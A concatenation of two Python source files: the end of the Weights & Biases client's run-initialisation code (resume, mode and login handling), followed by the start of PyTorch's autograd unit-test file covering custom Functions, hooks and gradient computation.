elif isinstance(magic, bool):
pass
else:
termwarn("wandb.init called with invalid magic parameter type", repeat=False)
from wandb import magic_impl
magic_impl.magic_install(init_args=init_args)
if dir:
os.environ[env.DIR] = dir
util.mkdir_exists_ok(wandb_dir())
if anonymous is not None:
os.environ[env.ANONYMOUS] = anonymous
if os.environ.get(env.ANONYMOUS, "never") not in ["allow", "must", "never"]:
raise LaunchError("anonymous must be set to 'allow', 'must', or 'never'")
resume_path = os.path.join(wandb_dir(), wandb_run.RESUME_FNAME)
if resume == True:
os.environ[env.RESUME] = "auto"
elif resume in ("allow", "must", "never"):
os.environ[env.RESUME] = resume
if id:
os.environ[env.RUN_ID] = id
elif resume:
os.environ[env.RESUME] = os.environ.get(env.RESUME, "allow")
# TODO: remove allowing resume as a string in the future
os.environ[env.RUN_ID] = id or resume
elif os.path.exists(resume_path):
os.remove(resume_path)
if os.environ.get(env.RESUME) == 'auto' and os.path.exists(resume_path):
if not os.environ.get(env.RUN_ID):
os.environ[env.RUN_ID] = json.load(open(resume_path))["run_id"]
# the following line is useful to ensure that no W&B logging happens in the user
# process that might interfere with what they do
# logging.basicConfig(format='user process %(asctime)s - %(name)s - %(levelname)s - %(message)s')
# If a thread calls wandb.init() it will get the same Run object as
# the parent. If a child process with distinct memory space calls
# wandb.init(), it won't get an error, but it will get a result of
# None.
# This check ensures that a child process can safely call wandb.init()
# after a parent has (only the parent will create the Run object).
# This doesn't protect against the case where the parent doesn't call
# wandb.init but two children do.
if run or os.getenv(env.INITED):
return run
if __stage_dir__ is None:
__stage_dir__ = "wandb"
util.mkdir_exists_ok(wandb_dir())
try:
signal.signal(signal.SIGQUIT, _debugger)
except AttributeError:
pass
try:
run = wandb_run.Run.from_environment_or_defaults()
_global_run_stack.append(run)
except IOError as e:
termerror('Failed to create run directory: {}'.format(e))
raise LaunchError("Could not write to filesystem.")
run.set_environment()
def set_global_config(run):
global config # because we already have a local config
config = run.config
set_global_config(run)
global summary
summary = run.summary
# set this immediately after setting the run and the config. if there is an
# exception after this it'll probably break the user script anyway
os.environ[env.INITED] = '1'
if in_jupyter:
_init_jupyter(run)
elif run.mode == 'clirun':
pass
elif run.mode == 'run':
api = InternalApi()
# let init_jupyter handle this itself
if not in_jupyter and not api.api_key:
termlog(
"W&B is a tool that helps track and visualize machine learning experiments")
if force:
termerror(
"No credentials found. Run \"wandb login\" or \"wandb off\" to disable wandb")
else:
if util.prompt_api_key(api):
_init_headless(run)
else:
termlog(
"No credentials found. Run \"wandb login\" to visualize your metrics")
run.mode = "dryrun"
_init_headless(run, False)
else:
_init_headless(run)
elif run.mode == 'dryrun':
termlog(
'Dry run mode, not syncing to the cloud.')
_init_headless(run, False)
else:
termerror(
'Invalid run mode "%s". Please unset WANDB_MODE.' % run.mode)
raise LaunchError("The WANDB_MODE environment variable is invalid.")
# set the run directory in the config so it actually gets persisted
run.config.set_run_dir(run.dir)
# we have re-read the config, add telemetry data
telemetry_updated = run.config._telemetry_update()
if sagemaker_config:
run.config._update(sagemaker_config)
allow_val_change = True
if config or telemetry_updated:
run.config._update(config, allow_val_change=allow_val_change, as_defaults=not allow_val_change)
# Access history to ensure resumed is set when resuming
run.history
# Load the summary to support resuming
run.summary.load()
return run
tensorflow = util.LazyLoader('tensorflow', globals(), 'wandb.tensorflow')
tensorboard = util.LazyLoader('tensorboard', globals(), 'wandb.tensorboard')
jupyter = util.LazyLoader('jupyter', globals(), 'wandb.jupyter')
keras = util.LazyLoader('keras', globals(), 'wandb.keras')
fastai = util.LazyLoader('fastai', globals(), 'wandb.fastai')
docker = util.LazyLoader('docker', globals(), 'wandb.docker')
xgboost = util.LazyLoader('xgboost', globals(), 'wandb.xgboost')
gym = util.LazyLoader('gym', globals(), 'wandb.gym')
ray = util.LazyLoader('ray', globals(), 'wandb.ray')
__all__ = ['init', 'config', 'summary', 'join', 'login', 'log', 'save', 'restore',
'tensorflow', 'watch', 'types', 'tensorboard', 'jupyter', 'keras', 'fastai',
'docker', 'xgboost', 'gym', 'ray', 'run', 'join', 'Image', 'Video',
'Audio', 'Table', 'Html', 'Object3D', 'Histogram', 'Graph', 'Api']
|
test_autograd.py | import gc
import io
import math
import os
import random
import sys
import tempfile
import threading
import time
import unittest
import uuid
import warnings
from copy import deepcopy
from collections import OrderedDict
from itertools import product, permutations
from operator import mul
from functools import reduce, partial
import torch
from torch import nn
from torch._six import inf, nan
from torch.autograd.function import once_differentiable
from torch.autograd.profiler import (profile, record_function, emit_nvtx)
from torch.autograd.profiler_util import (_format_time, EventList, FunctionEvent, FunctionEventAvg)
import torch.autograd.functional as autogradF
from torch.utils.checkpoint import checkpoint
from torch.testing._internal.common_cuda import TEST_CUDA
from torch.testing._internal.common_utils import (TestCase, run_tests, skipIfNoLapack,
suppress_warnings, slowTest,
load_tests,
IS_WINDOWS, IS_MACOS, CudaMemoryLeakCheck,
TEST_WITH_ROCM, disable_gc,
gradcheck, gradgradcheck, make_tensor)
from torch.autograd import Variable, Function, detect_anomaly, kineto_available
from torch.autograd.function import InplaceFunction
import torch.autograd.forward_ad as fwAD
from torch.testing._internal.common_methods_invocations import (
unpack_variables,
mask_not_all_zeros,
S)
from torch.testing._internal.common_device_type import (instantiate_device_type_tests, skipCUDAIfRocm,
onlyCPU, onlyCUDA, onlyOnCPUAndCUDA, dtypes, dtypesIfCUDA,
deviceCountAtLeast, skipCUDAIfCudnnVersionLessThan,
skipCUDAIf, skipMeta)
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
import pickle
PRECISION = 1e-4
def graph_desc(fn):
if fn is None:
return 'None'
result = type(fn).__name__ + '('
next_functions = fn.next_functions
for next_fn, _ in next_functions:
result += graph_desc(next_fn)
result += ', '
if next_functions:
result = result[:-2]
return result + ')'
class TestAutograd(TestCase):
def test_tensor_grad_warnings(self):
dummy = torch.empty(1)
with warnings.catch_warnings(record=True) as w:
# Accessing .grad on leaf
dummy.requires_grad_()
foo = dummy.grad
self.assertEqual(len(w), 0)
# Accessing .grad on non-leaf
dummy = dummy.clone()
foo = dummy.grad
self.assertEqual(len(w), 1)
# Accessing .grad on non-leaf that retains gradients
dummy.retain_grad()
foo = dummy.grad
self.assertEqual(len(w), 1)
def _function_test(self, cls):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
result = cls.apply(x, 2, y)
go = torch.ones((), requires_grad=True)
result.sum().backward(go, create_graph=True)
self.assertEqual(x.grad, y + torch.ones(5, 5))
self.assertEqual(y.grad, x + torch.ones(5, 5) * 2)
self.assertIsNotNone(x.grad.grad_fn)
self.assertIsNotNone(y.grad.grad_fn)
return x, y
def test_function(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, tensor1, pyscalar, tensor2):
ctx.pyscalar = pyscalar
ctx.save_for_backward(tensor1, tensor2)
return tensor1 + pyscalar * tensor2 + tensor1 * tensor2
@staticmethod
def backward(ctx, grad_output):
var1, var2 = ctx.saved_tensors
# NOTE: self is the test case here
self.assertIsInstance(var1, torch.Tensor)
self.assertIsInstance(var2, torch.Tensor)
self.assertIsInstance(grad_output, torch.Tensor)
return (grad_output + grad_output * var2, None,
grad_output * ctx.pyscalar + grad_output * var1)
x, y = self._function_test(MyFunction)
x_grad_desc = graph_desc(x.grad.grad_fn)
y_grad_desc = graph_desc(y.grad.grad_fn)
self.assertExpected(x_grad_desc, "x_grad_desc")
self.assertExpected(y_grad_desc, "y_grad_desc")
def test_once_differentiable(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, tensor1, pyscalar, tensor2):
ctx.pyscalar = pyscalar
ctx.save_for_backward(tensor1, tensor2)
return tensor1 + pyscalar * tensor2 + tensor1 * tensor2
@staticmethod
@once_differentiable
def backward(ctx, grad_output):
self.assertFalse(torch.is_grad_enabled())
t1, t2 = ctx.saved_tensors
return (grad_output + grad_output * t2, None,
grad_output * ctx.pyscalar + grad_output * t1)
x, y = self._function_test(MyFunction)
self.assertEqual(graph_desc(x.grad.grad_fn),
'CopyBackwards(None, Error(AccumulateGrad(), None, AccumulateGrad()))')
self.assertEqual(graph_desc(y.grad.grad_fn),
'CopyBackwards(None, Error(AccumulateGrad(), None, AccumulateGrad()))')
def test_function_returns_input(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad):
return grad * 2
for shape in [(1,), ()]:
v = torch.ones(shape, requires_grad=True)
MyFunction.apply(v).backward()
self.assertEqual(v.grad, torch.full(shape, 2.))
with torch.no_grad():
v.grad.zero_()
MyFunction.apply(v.clone()).backward()
self.assertEqual(v.grad, torch.full(shape, 2.))
def test_function_returns_undefined_tensor(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x * 2
@staticmethod
def backward(ctx, grad):
return None
# Test that undefined tensors returned from custom backward function
# are propagated as undefined and not tensor full of zeroes
x = torch.ones(1, requires_grad=True)
MyFunction.apply(x).backward()
self.assertIsNone(x.grad)
MyFunction.apply(x ** 2).backward()
self.assertIsNone(x.grad)
MyFunction.apply(x).sum().backward()
self.assertIsNone(x.grad)
self.assertIsNone(torch.autograd.grad(MyFunction.apply(x), x, allow_unused=True)[0])
def test_materialize_grads(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad):
self.assertEqual(grad, torch.zeros(1))
return grad
x = torch.ones(1, requires_grad=True)
torch._C._functions.UndefinedGrad()(MyFunction.apply(x)).backward()
def test_dont_materialize_grads(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
ctx.set_materialize_grads(False)
return x
@staticmethod
def backward(ctx, grad):
self.assertIsNone(grad)
return grad
x = torch.ones(1, requires_grad=True)
torch._C._functions.UndefinedGrad()(MyFunction.apply(x)).backward()
def test_legacy_function_deprecation_exception(self):
# Trigger exception
class MyFunction(Function):
def forward(self, x):
return x
def backward(self, grad_output):
return grad_output
# Check exception occurs
with self.assertRaisesRegex(
RuntimeError,
'Legacy autograd function with non-static forward method is deprecated'):
MyFunction()(torch.randn(3, 4))
class SimulateBackwardError(Function):
@staticmethod
def forward(ctx, input):
return input.clone()
@staticmethod
@once_differentiable
def backward(ctx, input):
raise Exception("Simulate error on backward pass")
def test_custom_function_exception(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
tmp = (t1 + t2) * (t1 + t2)
t3 = TestAutograd.SimulateBackwardError.apply(tmp)
with self.assertRaisesRegex(Exception, "Simulate error on backward pass"):
t3.sum().backward()
def test_custom_function_non_tensor_inputs_outputs(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, t1, t2, scale, t3):
t4 = t1 + t2 * t3
t5 = t1 * t2 + t3
t4 *= scale
t5 *= scale
# Save scale
ctx.scale = scale
ctx.save_for_backward(t1, t2, t3)
return scale, t4, None, True, t5, "bar", t1
@staticmethod
@once_differentiable
def backward(ctx, *grads):
# Verify grads
self.assertEqual(7, len(grads))
self.assertIsNone(grads[0])
self.assertIsNone(grads[2])
self.assertIsNone(grads[3])
self.assertIsNone(grads[5])
scale = ctx.scale
var1, var2, var3 = ctx.saved_tensors
return (
grads[1] * scale + grads[4] * var2 * scale + grads[6],
grads[1] * var3 * scale + grads[4] * var1 * scale,
None,
grads[1] * var2 * scale + grads[4] * scale,
)
t1 = torch.rand(10, dtype=torch.double, requires_grad=True)
t2 = torch.rand(10, dtype=torch.double, requires_grad=True)
t3 = torch.rand(10, dtype=torch.double)
scale = random.randint(0, 10)
res = MyFunction.apply(t1, t2, scale, t3)
self.assertEqual(scale, res[0])
self.assertEqual((t1 + t2 * t3) * scale, res[1])
self.assertEqual(None, res[2])
self.assertEqual(True, res[3])
self.assertEqual((t1 * t2 + t3) * scale, res[4])
self.assertEqual("bar", res[5])
self.assertEqual(t1, res[6])
# Validate running backward.
torch.autograd.backward([res[1].sum(), res[4].sum(), res[6].sum()])
self.assertIsNotNone(t1.grad)
self.assertIsNotNone(t2.grad)
self.assertIsNone(t3.grad)
# Test gradcheck
def foo(t1, t2, t3):
res = MyFunction.apply(t1, t2, scale, t3)
return res[1], res[4], res[6]
gradcheck(foo, (t1, t2, t3))
def test_custom_function_no_tensors(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, t1, t2, scale, t3):
t4 = t1 + t2 * t3
t5 = t1 * t2 + t3
t4 *= scale
t5 *= scale
return scale, t4, None, True, t5, "bar", t1
@staticmethod
@once_differentiable
def backward(ctx, *args):
return (args[0], args[1], None, args[2])
t1 = random.random()
t2 = random.random()
t3 = random.random()
scale = random.randint(0, 10)
res = MyFunction.apply(t1, t2, scale, t3)
self.assertEqual(scale, res[0])
self.assertEqual((t1 + t2 * t3) * scale, res[1])
self.assertEqual(None, res[2])
self.assertEqual(True, res[3])
self.assertEqual((t1 * t2 + t3) * scale, res[4])
self.assertEqual("bar", res[5])
self.assertEqual(t1, res[6])
def test_invalid_gradients(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x * 2
@staticmethod
def backward(ctx, grad_output):
return torch.randn(10, dtype=torch.float)
with self.assertRaisesRegex(RuntimeError, 'expected shape'):
input = torch.randn(5, 5, dtype=torch.float, requires_grad=True)
MyFunction.apply(input).sum().backward()
def test_unrelated_inputs(self):
# test to ensure grad(grad)check runs successfully even if there is an
# unrelated (but differentiable) inputs
def my_function(x, y):
return x * x
x = torch.rand(10, dtype=torch.double, requires_grad=True)
y = torch.rand(10, dtype=torch.double, requires_grad=True)
gradcheck(my_function, (x, y))
gradgradcheck(my_function, (x, y))
def test_not_implemented_grad(self):
a = torch.rand(2, requires_grad=True)
# if grad for nextafter ends up being implemented, this should be changed
y = torch.nextafter(a, a).sum()
with self.assertRaisesRegex(
NotImplementedError,
'the derivative for .* is not implemented'):
y.backward()
def test_not_implemented_fwad(self):
x = torch.randn(3)
v = torch.rand(3)
mat = torch.randn(2, 3)
with fwAD.dual_level():
dual_x = fwAD.make_dual(x, v)
err_msg = r"Trying to use forward AD with .* that does not support it"
hint_msg = "Running forward AD for an OP that does not implement it should raise a NotImplementedError"
with self.assertRaisesRegex(NotImplementedError, err_msg, msg=hint_msg):
# if forward AD ends up being implemented for torch.mv, choose a different op
res = torch.mv(mat, dual_x)
def test_accumulate_grad(self):
grad_output = torch.ones(5, 5)
def compute_grad(create_graph):
x = torch.randn(5, 5, requires_grad=True)
y = x + 2
y.backward(grad_output, retain_graph=True)
x_grad = x.grad
x_grad_clone = x.grad.clone()
y.backward(grad_output, create_graph=create_graph)
return x_grad, x_grad_clone
# Accumulate in-place when create_graph is False
x_grad, x_grad_clone = compute_grad(create_graph=False)
self.assertEqual(x_grad, x_grad_clone * 2)
# Accumulate out-of-place when create_graph is False
x_grad, x_grad_clone = compute_grad(create_graph=True)
self.assertEqual(x_grad, x_grad_clone)
def test_accumulate_grad_tensor_reference(self):
def _test_grad_tensor(params_grad_tensor, backward_grad_tensor, should_preserve_reference, create_graph):
params = torch.tensor([1.5, 1.5]).requires_grad_()
params.grad = params_grad_tensor
grad_saved = params.grad
params.backward(backward_grad_tensor, create_graph=create_graph)
self.assertEqual(id(grad_saved) == id(params.grad), should_preserve_reference)
for create_graph in (False, True):
# Accumulate dense gradient to sparse gradient will change the `params.grad` reference
_test_grad_tensor(
torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
torch.tensor([1.5, 1.5]),
False, # never accumulates in-place
create_graph)
# Accumulate dense gradient to dense gradient will preserve the `params.grad` reference,
# but only if create_graph=False.
_test_grad_tensor(
torch.tensor([1.5, 1.5]),
torch.tensor([1.5, 1.5]),
not create_graph,
create_graph)
# Accumulate sparse gradient to sparse gradient will preserve the `params.grad` reference,
# but only if create_graph=False.
_test_grad_tensor(
torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
not create_graph,
create_graph)
@skipIfNoLapack
def test_slogdet_sign(self):
a = torch.randn(3, 3, dtype=torch.double, requires_grad=True)
s, logdet = a.slogdet()
# test that sign should not require grad
self.assertFalse(s.requires_grad)
# test that backward through computation involving sign works
def sign_mul_logdet(mat):
s, logdet = mat.slogdet()
return s * logdet
u, s, v = a.detach().svd()
s.abs_().clamp_(0.0001)
for sign in (-1, 1):
s[-1] = sign
mat = torch.linalg.multi_dot([u, s.diag(), v.t()]).requires_grad_()
gradcheck(sign_mul_logdet, mat)
gradgradcheck(sign_mul_logdet, mat)
def test_sum_to_with_empty_dim_grad(self):
a = torch.rand(4, 0, requires_grad=True)
b = torch.rand(4, 1, requires_grad=True)
c = a + b
assert c.shape == (4, 0)
c.sum().backward()
self.assertEqual(b.grad, torch.zeros(4, 1))
self.assertEqual(a.grad, torch.zeros(4, 0))
def test_hessian_vector(self):
x = torch.randn(2, 2, requires_grad=True)
y = torch.randn(2, 2, requires_grad=True)
z = x ** 2 + y * x + y ** 2
z.backward(torch.ones(2, 2), create_graph=True)
with torch.no_grad():
x_grad = 2 * x + y
y_grad = x + 2 * y
self.assertEqual(x.grad, x_grad)
self.assertEqual(y.grad, y_grad)
grad_sum = 2 * x.grad + y.grad
grad_sum.backward(torch.ones(2, 2))
x_hv = torch.ones(2, 2) * 5
y_hv = torch.ones(2, 2) * 4
self.assertEqual(x.grad, x_grad + x_hv)
self.assertEqual(y.grad, y_grad + y_hv)
def test_grad(self):
x = torch.randn(2, 2, requires_grad=True)
y = torch.randn(2, 2, requires_grad=True)
z = x ** 2 + y * x + y ** 2
z.backward(torch.ones(2, 2), create_graph=True)
x_grad = 2 * x + y
y_grad = x + 2 * y
self.assertEqual(x.grad, x_grad)
self.assertEqual(y.grad, y_grad)
grad_sum = 2 * x.grad + y.grad
x_hv = torch.autograd.grad(
outputs=[grad_sum], grad_outputs=[torch.ones(2, 2)],
inputs=[x], create_graph=True)
expected_x_hv = torch.ones(2, 2) * 5
expected_y_hv = torch.ones(2, 2) * 4
self.assertEqual(x_hv[0], expected_x_hv)
self.assertEqual(x.grad, x_grad)
self.assertEqual(y.grad, y_grad)
# Test that grad_outputs and outputs have the same shape
grad_out = torch.ones(2)
try:
torch.autograd.grad(
outputs=[grad_sum], grad_outputs=[grad_out],
inputs=[x], create_graph=True)
self.assertFail()
except RuntimeError as error:
self.assertEqual(str(error), "Mismatch in shape: grad_output[0] has a shape of "
+ str(grad_out.shape) + " and output[0] has a shape of "
+ str(grad_sum.shape) + ".")
def test_grad_nonleaf(self):
x_init = torch.randn(2, 2, requires_grad=True)
x = x_init
y = torch.randn(2, 2, requires_grad=True)
grad_output = torch.ones(2, 2)
def fn(x):
return x ** 2 + y * x + y ** 2
for _ in range(5):
grad_x, = torch.autograd.grad(
fn(x), x, grad_outputs=grad_output, create_graph=True)
grad_x_expected = 2 * x + y
self.assertIsNone(y.grad)
self.assertIsNone(x.grad)
self.assertEqual(grad_x, grad_x_expected)
x = x + 0.05 * grad_x
val_init = fn(x_init).sum()
val_final = fn(x).sum()
self.assertGreater(val_final, val_init)
x.backward(grad_output)
self.assertIsNotNone(y.grad)
self.assertIsNotNone(x_init.grad)
def test_grad_nonleaf_many_outputs(self):
# This checks an edge case for function callbacks
# We want to capture two grads of a function, but can only
# register a single callback.
x = torch.randn(4, 2, requires_grad=True)
a, b = x.chunk(2)
def hook(*grads):
hook_called[0] = True
hook_called = [False]
x.register_hook(hook)
go = torch.randn(2, 2)
grad_a, grad_b = torch.autograd.grad(
(a + 2 * b), [a, b], grad_outputs=go, create_graph=True)
self.assertEqual(grad_a, go)
self.assertEqual(grad_b, go * 2)
self.assertFalse(hook_called[0])
self.assertIsNone(x.grad)
def test_grad_nonleaf_register_hook(self):
# This checks an edge case for register_hook.
# We want to capture grad of a nonleaf tensor,
# but avoid segfault during backward of other nonleaf tensors
x = torch.randn(5, requires_grad=True)
x_list = x.unbind()
x0 = x_list[0]
hook_results = [None]
def hook(grad):
hook_results[0] = grad
x0.register_hook(hook)
x_list[0].backward()
self.assertEqual(hook_results[0], torch.tensor(1.))
expected_grad = torch.tensor([1., 0, 0, 0, 0])
self.assertEqual(x.grad, expected_grad)
self.assertIsNone(x_list[0].grad)
for i in range(1, 5, 1):
x_list[i].backward()
self.assertEqual(hook_results[0], None)
expected_grad[i] = 1.0
self.assertEqual(x.grad, expected_grad)
self.assertIsNone(x_list[i].grad)
def test_hook_with_no_name(self):
# Create a hook that do not have a __name__ attribute
class MyHookClass:
def __call__(self, grad):
return grad.clone()
x = torch.randn(5, requires_grad=True).clone()
x.register_hook(MyHookClass())
x.sum().backward()
# Should run fine
def test_sharded_grad(self):
leaves = [torch.zeros(5, 5, requires_grad=True) for _ in range(10)]
intermediates = [l * i + l * l for i, l in enumerate(leaves)]
loss = sum(v * i for i, v in enumerate(intermediates)).sum()
# define a helper for dividing intermediates into groups
def group(l, group_size):
return (l[i:i + group_size] for i in range(0, len(l), group_size))
# Compute the d loss / d intermediates in chunks of shard_size
shard_size = 2
d_intermediates = [d_i for intermediates_batch in group(intermediates, shard_size)
for d_i in torch.autograd.grad(loss, intermediates_batch)]
# Compute rest of backward pass
torch.autograd.backward(intermediates, d_intermediates)
for i, l in enumerate(leaves):
self.assertEqual(l.grad, i * i * (1 + l))
def test_backward_badcalls(self):
x = torch.ones(1)
with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
x.backward()
def test_grad_badcalls(self):
x = torch.ones(1)
y = x ** 2
with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
torch.autograd.grad(x, y)
with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
torch.autograd.grad(y, x)
x = torch.ones(1, requires_grad=True)
y = x ** 2
torch.autograd.grad(y, x) # this should succeed now
def test_grad_empty_inputs(self):
x = torch.tensor([1.0], requires_grad=True)
with self.assertRaisesRegex(ValueError, "grad requires non-empty inputs."):
torch.autograd.grad(2 * x, [], grad_outputs=torch.tensor([1.0]))
def test_grad_fn_badcalls(self):
error_regex = 'expected .* arguments, got .* instead'
x = torch.ones(1, requires_grad=True)
y = x ** 2
with self.assertRaisesRegex(TypeError, error_regex):
y.grad_fn(x.detach(), x.detach()) # too many
with self.assertRaisesRegex(TypeError, error_regex):
y.grad_fn() # too few
y.grad_fn(x.detach()) # this should succeed
def test_grad_unreachable(self):
x = torch.ones(1, requires_grad=True)
y = torch.ones(1, requires_grad=True)
# Make sure x and y have grad accumulators allocated
z = x * 2
w = y * 2
grad_x, grad_y = torch.autograd.grad(x * 2, [x, y], allow_unused=True)
self.assertEqual(grad_x, x * 2)
self.assertIsNone(grad_y)
# This is slightly different than the case above, because z doesn't even
# have a grad accumulator allocated.
z = torch.ones(1, requires_grad=True)
grad_x, grad_z = torch.autograd.grad(x * 2, [x, z], allow_unused=True)
self.assertEqual(grad_x, x * 2)
self.assertIsNone(grad_z)
# allow_unused=False, but grads contains None inside, should throw
with self.assertRaisesRegex(RuntimeError,
"Set allow_unused=True"):
grad_x, grad_y = torch.autograd.grad(x * 2, [x, y], allow_unused=False)
def test_grad_unreachable_discovery(self):
# Test that certain nodes are not erroneously executed when an input
# is unreachable. See #39784
class MyFunc(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, x):
self.fail("This node should not be executed!")
x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
y = torch.randn(1, requires_grad=True)
(gY,) = torch.autograd.grad(x, (y, ), allow_unused=True)
self.assertIsNone(gY)
x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
y = torch.randn(1, requires_grad=True)
z = torch.randn(1, requires_grad=True)
(gY, gZ) = torch.autograd.grad(x + z, (y, z), allow_unused=True)
self.assertIsNone(gY)
self.assertIsNotNone(gZ)
x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
y = torch.randn(1, requires_grad=True)
torch.autograd.backward(x, inputs=(y, )) # allow_unused is implicitly True!
self.assertIsNone(y.grad)
def test_hooks(self):
x = torch.ones(5, 5, requires_grad=True)
y = torch.ones(5, 5) * 4
y.requires_grad_(True)
counter = [0]
def bw_hook(inc, grad):
self.assertIsInstance(grad, torch.Tensor)
counter[0] += inc
z = x ** 2 + x * 2 + x * y + y
x.register_hook(lambda *args: bw_hook(0, *args))
test = z.register_hook(lambda *args: bw_hook(1, *args))
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(counter[0], 1)
test2 = z.register_hook(lambda *args: bw_hook(2, *args))
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(counter[0], 4)
test2.remove()
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(counter[0], 5)
def bw_hook_modify(grad):
return grad.mul(2)
test.remove()
z.register_hook(bw_hook_modify)
with torch.no_grad():
y.grad.zero_()
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(y.grad, (x + 1) * 2)
y.register_hook(bw_hook_modify)
with torch.no_grad():
y.grad.zero_()
z.backward(torch.ones(5, 5))
self.assertEqual(y.grad, (x + 1) * 4)
def test_hooks_cpp(self):
# Tests hooks for autograd function implemented in C++
bn = torch.nn.BatchNorm1d(5, affine=False)
bn.double()
bn.eval()
counter = [0]
def bw_hook(grad):
counter[0] += 1
return grad * 2
x = torch.ones(5, 5, dtype=torch.double, requires_grad=True)
z = bn(x)
z.register_hook(bw_hook)
z.sum().backward()
self.assertEqual(counter[0], 1, msg='bw_hook not called')
self.assertEqual(x.grad, torch.ones(5, 5, dtype=torch.double) * 2, atol=1e-5, rtol=0)
def test_hook_none(self):
# WARNING: this is a test for autograd internals.
# You should never have to use such things in your code.
class NoneGradientFunction(Function):
@staticmethod
def forward(ctx, x, y):
assert ctx.needs_input_grad[0]
assert not ctx.needs_input_grad[1]
return x, y
@staticmethod
def backward(ctx, grad_x, grad_y):
return grad_x, None
was_called = [False]
def hook(grad):
self.assertIsNotNone(grad)
was_called[0] = True
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5)
rx, ry = NoneGradientFunction.apply(x, y)
rx.register_hook(hook)
ry.register_hook(hook)
sum(rx, ry).sum().backward()
self.assertTrue(was_called[0])
def test_retain_grad(self):
input = torch.rand(1, 3, requires_grad=True)
h1 = input * 3
out = (h1 * h1).sum()
# It should be possible to call retain_grad() multiple times
h1.retain_grad()
h1.retain_grad()
# Gradient should be accumulated
out.backward(retain_graph=True)
self.assertEqual(h1 * 2, h1.grad)
out.backward(retain_graph=True)
self.assertEqual(h1 * 4, h1.grad)
with torch.no_grad():
input.grad.zero_()
# It should be a no-op for leaves
input.retain_grad()
input.retain_grad()
out.backward()
self.assertEqual(input * 18, input.grad)
def test_retain_grad_cycle(self):
x = torch.ones(5, 5, requires_grad=True)
def run_test():
y = x * 2
y.retain_grad()
return y / 2, torch._C._WeakTensorRef(y)
z, ref = run_test()
self.assertTrue(ref.expired())
z.sum().backward()
def test_backward(self):
v = torch.randn(5, 5, requires_grad=True)
x = torch.randn(5, 5, requires_grad=True)
y = (torch.rand(5, 5) + 0.1).requires_grad_(True)
z = torch.randn(5, 5, requires_grad=True)
grad_output = torch.randn(5, 5)
v.backward(grad_output)
self.assertEqual(v.grad, grad_output)
a = x + (y * z) + 4 * z ** 2 * x / y
a.backward(grad_output)
x_grad = 4 * z.pow(2) / y + 1
y_grad = z - 4 * x * z.pow(2) / y.pow(2)
z_grad = 8 * x * z / y + y
self.assertEqual(x.grad, x_grad * grad_output)
self.assertEqual(y.grad, y_grad * grad_output)
self.assertEqual(z.grad, z_grad * grad_output)
def test_sparse_mm_backward(self):
size = (3, 3)
sparse = torch.sparse_coo_tensor(size, requires_grad=True)
dense = torch.randn(size, requires_grad=True)
with self.assertRaisesRegex(
RuntimeError,
"The backward pass for this operation requires the 'mat1' tensor to be strided,"):
z = dense.addmm(sparse, dense)
mm_test_cases = [
# a requires grad, a is sparse, b requires grad, b is sparse, error message
(False, True, True, False, None),
(False, False, True, True, "The backward pass for this operation requires the 'mat2'"),
(False, True, True, True, "The backward pass for this operation requires the 'mat2'"),
(True, False, True, True, "The backward pass for this operation requires the 'mat2'"),
(True, True, False, False, "The backward pass for this operation requires the 'self'"),
(True, True, True, False, "The backward pass for this operation requires the 'self'"),
(True, True, True, True, "The backward pass for this operation requires the 'mat2'"),
]
for a_req_grad, a_is_sparse, b_req_grad, b_is_sparse, err_msg in mm_test_cases:
# We should only be testing cases with sparse inputs, and at least one
# input needs to require grad so we can call a backward pass
assert a_is_sparse or b_is_sparse
assert a_req_grad or b_req_grad
a = torch.randn(size, requires_grad=a_req_grad)
if a_is_sparse:
a = a.to_sparse()
b = torch.randn(size, requires_grad=b_req_grad)
if b_is_sparse:
b = b.to_sparse()
# If no error expected, check that sparse and dense cases match
if err_msg is None:
r = a.mm(b)
r.sum().backward()
a_grad = None if a.grad is None else a.grad.clone().detach()
b_grad = None if b.grad is None else b.grad.clone().detach()
# Redo with only dense tensors
a = (a.to_dense() if a.is_sparse else a).clone().detach()
a.requires_grad = a_req_grad
b = (b.to_dense() if b.is_sparse else b).clone().detach()
b.requires_grad = b_req_grad
r = a.mm(b)
r.sum().backward()
self.assertEqual(a_grad, a.grad)
self.assertEqual(b_grad, b.grad)
else:
with self.assertRaisesRegex(RuntimeError, err_msg):
a.mm(b)
def test_multi_backward(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
q = torch.randn(5, 5, requires_grad=True)
a = torch.randn(5, 5, requires_grad=True)
b = torch.randn(5, 5, requires_grad=True)
q2 = q * 2
z = x + y + q2
c = a * b + q2
grad_z = torch.randn(5, 5)
grad_c = torch.randn(5, 5)
torch.autograd.backward([z, c], [grad_z, grad_c])
self.assertEqual(x.grad, grad_z)
self.assertEqual(y.grad, grad_z)
